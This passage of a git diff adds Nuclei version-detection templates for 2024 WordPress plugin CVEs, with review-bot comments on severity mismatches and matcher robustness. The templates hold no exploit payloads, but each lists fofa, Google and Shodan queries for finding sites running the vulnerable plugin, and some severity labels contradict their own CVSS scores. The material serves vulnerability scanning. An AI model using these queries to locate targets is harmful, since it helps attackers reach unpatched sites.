internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-user-frontend" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-38856.yaml b/nuclei-templates/CVE-2024/CVE-2024-38856.yaml index 1c301d3a01..2aa43a804b 100644 --- a/nuclei-templates/CVE-2024/CVE-2024-38856.yaml 
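Review bot: `severity: low` and the `low` tag disagree with the classification in the same hunk, `cvss-score: 9.1` with `C:H/I:H/A:H`. Anyone filtering scans by severity will skip this template even though its own score puts it in the critical range. Make the two agree, either `severity: critical` with the matching tag if 9.1 is right, or a corrected vector and score if low is intended; the page does not show which source is authoritative. CVE-2024-39642.yaml has the same mismatch (`severity: low` with `cvss-score: 5.4`).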
+++ b/nuclei-templates/CVE-2024/CVE-2024-38856.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 fofa-query: app="Apache_OFBiz" - tags: cve,cve2024,ofbiz,apache,rce + tags: cve,cve2024,ofbiz,apache,rce,kev http: - raw: diff --git a/nuclei-templates/CVE-2024/CVE-2024-39641.yaml b/nuclei-templates/CVE-2024/CVE-2024-39641.yaml new file mode 100644 index 0000000000..b63b4aa1ff --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39641.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-39641 + +info: + name: > + LearnPress <= 4.2.6.8.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.6.8.2. This is due to missing or incorrect nonce validation on an unknown function. This makes it possible for unauthenticated attackers to perform an unknown action granted they can trick a site administrator into performing an action such as clicking on a link. The impact of this vulnerability is unknown. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/52d6f0c3-2e2e-44cb-a5ea-85c19424ddac?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-39641 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-39641' + tags: cve,wordpress,wp-plugin,learnpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.6.8.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39642.yaml b/nuclei-templates/CVE-2024/CVE-2024-39642.yaml new file mode 100644 index 0000000000..d9224ed440 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39642.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-39642
+
+info:
+ name: >
+ LearnPress <= 4.2.6.8.2 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+ The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.6.8.2 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7449ed1e-cc09-4b8b-8226-7cdc70be2b36?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-39642
+ metadata:
+ fofa-query: "wp-content/plugins/learnpress/"
+ google-query: inurl:"/wp-content/plugins/learnpress/"
+ shodan-query: 'vuln:CVE-2024-39642'
+ tags: cve,wordpress,wp-plugin,learnpress,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "learnpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.6.8.2')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39643.yaml b/nuclei-templates/CVE-2024/CVE-2024-39643.yaml
new file mode 100644
index 0000000000..004cfb6a53
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39643.yaml
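Review bot: `severity: low` disagrees with the `cvss-score: 5.4` declared in the same template, which sits in the CVSS 3.1 medium band; if the field is meant to follow the score it should read `severity: medium`, with the trailing `low` tag changed to match. The same mismatch appears in CVE-2024-39648, -39649, -39659, -39660, -39661, -39665 and -39668 (all `low` with a score of 6.4) and most sharply in CVE-2024-39658, which is `low` with `cvss-score: 9.1`. It looks as if the generator lowers severity for any authenticated issue; if that is deliberate, a comment stating the rule would stop anyone who filters scan results on `severity` from assuming it tracks CVSS.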
@@ -0,0 +1,59 @@
+id: CVE-2024-39643
+
+info:
+ name: >
+ RegistrationMagic <= 6.0.0.1 - Unauthenticated Stored Cross-Site Scripting
+ author: topscoder
+ severity: high
+ description: >
+ The RegistrationMagic – User Registration Plugin with Custom Registration Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.0.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/41985e86-eda4-4914-a7f8-3758afcc6193?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cve-id: CVE-2024-39643
+ metadata:
+ fofa-query: "wp-content/plugins/custom-registration-form-builder-with-submission-manager/"
+ google-query: inurl:"/wp-content/plugins/custom-registration-form-builder-with-submission-manager/"
+ shodan-query: 'vuln:CVE-2024-39643'
+ tags: cve,wordpress,wp-plugin,custom-registration-form-builder-with-submission-manager,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/custom-registration-form-builder-with-submission-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "custom-registration-form-builder-with-submission-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.0.1')
\ No newline at end of file
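Review bot: The `word` matcher requires the literal directory slug `custom-registration-form-builder-with-submission-manager` in the body of `readme.txt`, but a plugin readme is not guaranteed to mention its own directory name, so an affected install could fail the `and` condition and go unreported. Whether this particular readme contains the slug cannot be told from the diff, so it is worth checking against a real copy of the file. Matching on text the request already depends on, such as `Stable tag:`, would be more robust than matching on the slug. The same applies to the other templates in this commit whose slug differs from the plugin's display name, for example `cf7-message-filter`, `wp-event-solution`, `wp-poll`, `wplr-sync`, `fulltext-search` and `ymc-smart-filter`.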
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39646.yaml b/nuclei-templates/CVE-2024/CVE-2024-39646.yaml
new file mode 100644
index 0000000000..9b7dec9b05
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39646.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39646
+
+info:
+ name: >
+ Custom 404 Pro <= 3.11.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Custom 404 Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'c4pmessageType' and 'c4pmessage' parameters in versions up to, and including, 3.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/724a7579-74c6-46b2-b1b4-a92e980aaa83?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-39646
+ metadata:
+ fofa-query: "wp-content/plugins/custom-404-pro/"
+ google-query: inurl:"/wp-content/plugins/custom-404-pro/"
+ shodan-query: 'vuln:CVE-2024-39646'
+ tags: cve,wordpress,wp-plugin,custom-404-pro,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/custom-404-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "custom-404-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.11.1')
\ No newline at end of file
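Review bot: `redirects: true` with `max-redirects: 3` lets the probe follow redirects to any host, so a `readme.txt` served from somewhere else (a CDN, a parked-domain page, a sibling install) can satisfy the matchers and be attributed to the scanned target. Using `host-redirects: true` in place of `redirects: true` keeps the check on the original host and removes that source of false positives. Every template added in this commit carries the same two lines, so the change is better made in the generator than per file.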
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39647.yaml b/nuclei-templates/CVE-2024/CVE-2024-39647.yaml
new file mode 100644
index 0000000000..306479a196
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39647.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39647
+
+info:
+ name: >
+ Message Filter for Contact Form 7 <= 1.6.1.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'form' parameter in all versions up to, and including, 1.6.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/31ed0d2a-94bc-4526-9d21-6f2f544696d2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-39647
+ metadata:
+ fofa-query: "wp-content/plugins/cf7-message-filter/"
+ google-query: inurl:"/wp-content/plugins/cf7-message-filter/"
+ shodan-query: 'vuln:CVE-2024-39647'
+ tags: cve,wordpress,wp-plugin,cf7-message-filter,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cf7-message-filter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cf7-message-filter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.1.1')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39648.yaml b/nuclei-templates/CVE-2024/CVE-2024-39648.yaml
new file mode 100644
index 0000000000..c469fc54e5
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39648.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39648
+
+info:
+ name: >
+ Eventin <= 4.0.5 - Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Eventin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b5451529-2e3f-414e-884e-cc6761431262?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-39648
+ metadata:
+ fofa-query: "wp-content/plugins/wp-event-solution/"
+ google-query: inurl:"/wp-content/plugins/wp-event-solution/"
+ shodan-query: 'vuln:CVE-2024-39648'
+ tags: cve,wordpress,wp-plugin,wp-event-solution,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-event-solution/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-event-solution"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.5')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39649.yaml b/nuclei-templates/CVE-2024/CVE-2024-39649.yaml
new file mode 100644
index 0000000000..dd57158fd8
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39649.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39649
+
+info:
+ name: >
+ Essential Addons for Elementor <= 5.9.26 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Essential Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.9.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/eee7cad6-7910-4860-add9-c500d1f6eff3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-39649
+ metadata:
+ fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/"
+ google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/"
+ shodan-query: 'vuln:CVE-2024-39649'
+ tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "essential-addons-for-elementor-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.9.26')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39651.yaml b/nuclei-templates/CVE-2024/CVE-2024-39651.yaml
new file mode 100644
index 0000000000..6cd642f71e
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39651.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39651
+
+info:
+ name: >
+ WooCommerce PDF Vouchers <= 4.9.4 - Unauthenticated Arbitrary File Deletion
+ author: topscoder
+ severity: critical
+ description: >
+ The WooCommerce - PDF Vouchers plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in a function in all versions up to, and including, 4.9.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3ccde73-8b88-48f9-8bbd-0392fcc40c81?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+ cvss-score: 9.1
+ cve-id: CVE-2024-39651
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce-pdf-vouchers/"
+ google-query: inurl:"/wp-content/plugins/woocommerce-pdf-vouchers/"
+ shodan-query: 'vuln:CVE-2024-39651'
+ tags: cve,wordpress,wp-plugin,woocommerce-pdf-vouchers,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-vouchers/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce-pdf-vouchers"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.9.4')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39652.yaml b/nuclei-templates/CVE-2024/CVE-2024-39652.yaml
new file mode 100644
index 0000000000..67592b9bc1
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39652.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39652
+
+info:
+ name: >
+ WooCommerce PDF Vouchers <= 4.9.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WooCommerce - PDF Vouchers plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 4.9.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/19286e18-f30d-40e8-80fa-cd1b4d065f80?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-39652
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce-pdf-vouchers/"
+ google-query: inurl:"/wp-content/plugins/woocommerce-pdf-vouchers/"
+ shodan-query: 'vuln:CVE-2024-39652'
+ tags: cve,wordpress,wp-plugin,woocommerce-pdf-vouchers,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-vouchers/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce-pdf-vouchers"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.9.4')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39653.yaml b/nuclei-templates/CVE-2024/CVE-2024-39653.yaml
new file mode 100644
index 0000000000..c02df5554c
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39653.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39653
+
+info:
+ name: >
+ VikRentCar <= 1.4.0 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The VikRentCar plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.4.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/51fd6124-4954-4827-a665-c2d94d74a512?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2024-39653
+ metadata:
+ fofa-query: "wp-content/plugins/vikrentcar/"
+ google-query: inurl:"/wp-content/plugins/vikrentcar/"
+ shodan-query: 'vuln:CVE-2024-39653'
+ tags: cve,wordpress,wp-plugin,vikrentcar,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/vikrentcar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "vikrentcar"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39655.yaml b/nuclei-templates/CVE-2024/CVE-2024-39655.yaml
new file mode 100644
index 0000000000..b2594d64da
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39655.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39655
+
+info:
+ name: >
+ LiquidPoll – Advanced Polls for Creators and Brands <= 3.3.77 - Unauthenticated Stored Cross-Site Scripting
+ author: topscoder
+ severity: high
+ description: >
+ The LiquidPoll – Polls, Surveys, NPS and Feedback Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via poll comments in all versions up to, and including, 3.3.77 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3a993fb-cec5-4a36-9f92-3defff0ab11b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cve-id: CVE-2024-39655
+ metadata:
+ fofa-query: "wp-content/plugins/wp-poll/"
+ google-query: inurl:"/wp-content/plugins/wp-poll/"
+ shodan-query: 'vuln:CVE-2024-39655'
+ tags: cve,wordpress,wp-plugin,wp-poll,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-poll/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-poll"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.77')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39656.yaml b/nuclei-templates/CVE-2024/CVE-2024-39656.yaml
new file mode 100644
index 0000000000..3f38f6db3d
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39656.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39656
+
+info:
+ name: >
+ Tin Canny Reporting for LearnDash <= 4.3.0.7 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Tin Canny Reporting for LearnDash plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.3.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/634c1e9d-85ba-4860-a3e4-a65bf3f23919?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-39656
+ metadata:
+ fofa-query: "wp-content/plugins/tin-canny-learndash-reporting/"
+ google-query: inurl:"/wp-content/plugins/tin-canny-learndash-reporting/"
+ shodan-query: 'vuln:CVE-2024-39656'
+ tags: cve,wordpress,wp-plugin,tin-canny-learndash-reporting,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tin-canny-learndash-reporting/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tin-canny-learndash-reporting"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.3.0.7')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39658.yaml b/nuclei-templates/CVE-2024/CVE-2024-39658.yaml
new file mode 100644
index 0000000000..2eaec28d3e
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39658.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39658
+
+info:
+ name: >
+ Salon booking system <= 10.7 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Salon booking system plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in versions up to, and including, 10.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5b74a84-e418-4bd4-b36e-5bd4ba5197c9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.1
+ cve-id: CVE-2024-39658
+ metadata:
+ fofa-query: "wp-content/plugins/salon-booking-system/"
+ google-query: inurl:"/wp-content/plugins/salon-booking-system/"
+ shodan-query: 'vuln:CVE-2024-39658'
+ tags: cve,wordpress,wp-plugin,salon-booking-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "salon-booking-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 10.7')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39659.yaml b/nuclei-templates/CVE-2024/CVE-2024-39659.yaml
new file mode 100644
index 0000000000..73422ec99c
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39659.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39659
+
+info:
+ name: >
+ WP-PostRatings <= 1.91.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP-PostRatings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Google rich text snippets in versions up to, and including, 1.91.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
